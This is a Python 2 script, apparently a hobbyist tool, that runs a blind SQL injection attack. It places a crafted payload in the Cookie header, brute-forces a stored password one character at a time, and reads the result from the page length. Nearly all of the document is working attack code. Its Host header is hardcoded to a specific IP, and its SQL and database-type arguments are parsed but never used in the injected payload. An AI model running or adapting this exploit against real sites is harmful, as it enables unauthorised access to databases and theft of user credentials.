#!/usr/bin/env python
#Blind SQL injection Exploit version 1.0
#Language: Python (2.6)
#Author: gamma95

import os
import sys
import urllib2
import struct
import urllib
print """
                              #######################################################################
                              # Blind SQL injection Toy: version 1.0                                #
                              # Coded by: gamma95 (Gamma95[at]gmail.com)                            #
                              # Language: Python (2.6)                                              #    
                              #                                                                     #
                              #                                                                     #
                              #                                                                     #
                              #  Usage: ./blind.py -url -sql -dbserver                              #    
                              #  EX: ./blind.py "http://victim.com/index.php?id=1" "user()" "mysql" #
                              #######################################################################  
"""
if len(sys.argv) != 4:
    print "[+] Syntax Error"
    exit()
url = sys.argv[1]
sql = sys.argv[2]
sqlserver = sys.argv[3]
def encodeurl(string):
    return string.replace(' ','%20')


def check(url):
    
    return True
    
########function implement Blind sql injection###########
def execute(url, sql, sqlserver):
    lenght = 9999 
    if sqlserver =='mysql':
        str1 = " AND MID("
    elif sqlserver =='mssql':
        str1 = " AND SUBSTRING("
    elif sqlserver =='oracle':
        str1 = " AND SUBSTR("
    else:
        print "[+] argv[4] = mssql or mysql !!! Plz check your input"
        exit()
    result = ""
    dic = [chr(i) for i in range(97, 123)]
    dic.append("_")
    count = 0
    check = 0
    for i in range(1, int(lenght)):
        kount = 0
        if check == 1:
            #print "The End !!!"
            break
        for line in dic:
            kount = kount + 1
            flag = 0
            chuoi = ""
            values = {'username': 'guest',
                       'password': 'guest' }
            data = urllib.urlencode(values)
            user_agent = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20071008 Ubuntu/7.10 (gutsy) Firefox/2.0.0.6'
            headers = { 'User-Agent' : user_agent, 'Referer' : url, 'Connection': 'keep-alive', 'Host': '50.57.51.240', 'Cookie': 'user_id=0 and password like binary 0x' + result.encode('hex') + line.encode('hex') + '25'}
            exploit = encodeurl(url)
            req = urllib2.Request(exploit, data, headers)
            try:
                response = urllib2.urlopen(req)
            except:
                print "[+] Connection error"
                exit()
            page = response.read()
            len1 = len(page)
            count = count + 1
            if len1 <> 1025:#if len1 == 1025, it is a false request, else return true
                result = result + line
                print result
                #sys.stdout.write()
                flag = 1
                break #
            elif kount == len(dic):
                check = 1
                break
            else:
                continue
    print "[+] Numbers of request: "+str(count)
    print "[+] Done !!! Result: "+sql+" = "+result
    ##############

if check(url):
    
    print """
    [+] Sending Malicious Request
    [+] Plz wait ... :)
                """
    execute(url, sql, sqlserver)
else:
    print "Not vul"
    exit()
exit()